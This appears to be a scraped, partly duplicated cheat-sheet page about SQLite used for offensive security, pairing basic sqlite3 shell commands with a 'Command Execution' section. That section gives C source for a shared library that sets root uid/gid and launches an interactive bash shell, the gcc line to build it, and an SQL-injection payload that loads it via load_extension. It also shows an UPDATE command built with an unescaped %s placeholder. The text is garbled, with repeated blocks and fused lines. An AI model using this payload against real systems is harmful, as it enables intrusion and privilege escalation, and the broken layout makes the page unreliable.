SQLite
SQLite
Commands
# Open DB file
.open <your_file.db>
# List databases
.databases
# List tables
.tables
# Structure of table
.schema <table>Command Execution
load_extension
Last updated
# Open DB file
.open <your_file.db>
# List databases
.databases
# List tables
.tables
# Structure of table
.schema <table>Last updated
/usr/bin/sqlite3 db.sqlite3 -line \'UPDATE accounts_customuser SET is_active=1 WHERE username=\"%s\";\'// test.c
#include <stdlib.h>
#include <unistd.h>
void _init() {
setuid(0);
setgid(0);
system("/bin/bash -i");
}gcc -shared -fPIC -nostartfiles -o test.so test.c"+load_extension('test.so')+"